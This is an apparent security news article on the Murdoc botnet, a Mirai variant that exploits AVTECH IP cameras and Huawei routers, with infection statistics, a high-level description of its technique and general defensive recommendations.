The Rise of Murdoc Botnet: A New Mirai Variant Targeting IoT Devices

2025-01-22

The cybersecurity landscape is constantly evolving, with threat actors developing increasingly sophisticated methods to exploit vulnerabilities in connected devices. One such emerging threat is the Murdoc Botnet, a new variant of the infamous Mirai malware family. Recently uncovered by the Qualys Threat Research Unit, this botnet specifically targets vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, posing a significant risk to IoT ecosystems worldwide.

Since its discovery in July 2024, the Murdoc Botnet has already infected over 1,300 systems, with the majority of victims located in Malaysia, Thailand, Mexico, and Indonesia. The botnet leverages known exploits, such as CVE-2024-7029 and CVE-2017-17215, to propagate its malicious payloads. Researchers have identified more than 100 servers actively distributing Mirai malware and communicating with compromised devices, indicating that the campaign is still ongoing.

The Murdoc Botnet employs a multi-stage attack mechanism. It uses command-line injection to fetch, execute, and remove shell scripts on targeted AVTECH cameras. Over 500 samples containing ELF files and ShellScript files have been discovered, highlighting the botnet’s focus on IoT devices. The shell script utilizes GTFOBins to fetch the payload, grant execution permissions, execute it, and then remove traces of the attack.

This botnet is not an isolated threat. Recently, the Mirai-based Gayfemboy botnet was observed exploiting over 20 vulnerabilities, including CVE-2024-12856 in Four-Faith industrial routers and several unknown vulnerabilities in Neterbit and Vimar devices. These attacks underscore the growing trend of threat actors targeting IoT devices, which often lack robust security measures.

As IoT adoption continues to rise, so does the risk of large-scale botnet attacks. Organizations and individuals must prioritize securing their devices by applying patches, changing default credentials, and monitoring network traffic for unusual activity.

What Undercode Say:

The emergence of the Murdoc Botnet is a stark reminder of the vulnerabilities inherent in IoT devices. While the convenience and functionality of connected devices have revolutionized industries, their security often lags behind. The Murdoc Botnet’s exploitation of known vulnerabilities, such as CVE-2024-7029 and CVE-2017-17215, highlights the critical need for timely patch management and proactive security measures.

One of the most concerning aspects of this botnet is its ability to propagate through command-line injection and shell scripts. This technique allows the malware to execute payloads on compromised devices while evading detection by removing traces of its activity. The use of GTFOBins further complicates mitigation efforts, as it enables the botnet to bypass traditional security controls.

The geographic distribution of infected systems—primarily in Malaysia, Thailand, Mexico, and Indonesia—suggests that the attackers are targeting regions with high IoT adoption but potentially weaker cybersecurity infrastructure. This trend is not new; threat actors often focus on areas where they can maximize their impact with minimal resistance.

The Murdoc

Moreover, the overlap between the Murdoc Botnet and the Gayfemboy botnet highlights the evolving tactics of cybercriminals. By exploiting a wide range of vulnerabilities, including zero-day exploits, these botnets demonstrate the increasing sophistication of IoT-targeted attacks. The use of Telnet weak credentials further underscores the importance of strong authentication mechanisms.

To combat these threats, organizations must adopt a multi-layered security approach. This includes:
1. Regularly updating firmware and software to patch known vulnerabilities.
2. Changing default credentials on IoT devices to prevent brute-force attacks.
3. Implementing network segmentation to isolate IoT devices from critical systems.
4. Monitoring network traffic for unusual patterns that may indicate a compromise.
5. Collaborating with cybersecurity researchers to stay informed about emerging threats.

The rise of botnets like Murdoc and Gayfemboy serves as a wake-up call for the IoT industry. As connected devices become more integrated into our daily lives, the stakes for securing them have never been higher. By addressing these challenges head-on, we can mitigate the risks and ensure a safer digital future.

In conclusion, the Murdoc Botnet is a potent reminder of the vulnerabilities in IoT ecosystems and the need for robust cybersecurity practices. As threat actors continue to innovate, staying vigilant and proactive is the key to defending against these ever-evolving threats.